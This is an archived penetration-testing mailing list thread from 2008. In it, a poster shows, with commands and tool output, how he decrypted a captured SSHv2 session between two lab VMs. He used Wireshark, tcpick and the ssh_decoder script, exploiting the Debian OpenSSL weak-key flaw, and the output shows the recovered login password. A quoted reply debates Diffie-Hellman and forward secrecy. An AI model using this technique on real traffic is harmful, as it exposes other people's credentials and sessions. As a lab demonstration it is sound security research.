Home page logo

pen-test logo Penetration Testing mailing list archives

Re: How to decrypt a connection SSH v2?
From: Ulises2k <ulises2k () gmail com>
Date: Thu, 10 Jul 2008 17:38:07 -0300

I do.
Thank very much at Raphaël Rigo, development ssh_decoder.[0]

I have 2 Virtual Machines, 1 ubuntu 8.04 server (no updated) and 1
ubuntu 8.04 client (no updated).
VM have vulnerability libssl discovery by Luciano Bello on May-2008.

Client TTY 1:
$ sudo wireshark

In other terminal (TTY2) exec:
user () 192 168 230 143's password:
Last login: Wed Jul  9 17:10:04 2008 from
user () ubuntu804server:~$ echo "este es un comando tirado en el server"
user () ubuntu804server:~$ exit

Client TTY1:
$Stop sniffing Wireshark.
Save file "sshv2.cap"

$ tcpick -wRC -wRS -r sshv2.cap
Starting tcpick 0.2.1 at 2008-07-10 14:14 EDT
Timeout for connections is 600
tcpick: reading from sshv2.cap
1      SYN-SENT >
1      FIN-WAIT-1 >
1      TIME-WAIT >
1      CLOSED >
tcpick: done reading from sshv2.cap

81 packets captured
1 tcp sessions detected

$ ruby ssh_decoder.rb tcpick*
 * read handshake
cipher: aes128-cbc, mac: hmac-md5, kex_hash: sha256, compr: none
 * bruteforce DH
DH shared secret :
 * derive keys
 * decipher streams
 * successful authentication packet
 * deciphered streams saved to "sshdecrypt.0.client.dat" &

User: User
Password: superpassword

In sshdecrypt.0.client.dat and sshdecrypt.0.server.dat all text

The script (ssh_decoder and ssh_kex_keygen ) generate private key.

Dowload ssh_decoder and ssh_kex_keygen [0]


Thank you very much.

Ulises U. Cuñé
Web: http://www.ulises2k.com.ar

On Thu, Jul 10, 2008 at 14:25, Gary E. Miller <gem () rellim com> wrote:
Hash: SHA1

Yo Paul!

On Thu, 10 Jul 2008, Paul Melson wrote:

I assume if the attacker has the public and private keys from not just
one, but both ends, that PFS is not an obstacle.

It's my understanding that even if you have both endpoints' public and
private key pairs, that's not enough to recreate the ephemeral keys used
during a particular session.  Without those keys, the packet capture cannot
be decrypted.

Read the RFC and tell me that again:

       "The Diffie-Hellman (DH) key exchange provides a shared secret
       that cannot be determined by either party alone. "

The whole point if the key exchange is to use both sets of
public/private keys to generate this shared secret, and only those 4
keys.  If you possess those 4 keys then game over, you can decode the
shared key.

Looks to me that the RFC tells you all you need to know to recover
the shared secret.    If someone had some time on their hands
they could probably grab most of the needed code out of the openssh

- ---------------------------------------------------------------------------
Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701
       gem () rellim com  Tel:+1(541)382-8588

Version: GnuPG v1.4.3 (GNU/Linux)


This list is sponsored by: Cenzic

Top 5 Common Mistakes in
Securing Web Applications
Get 45 Min Video and PPT Slides


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]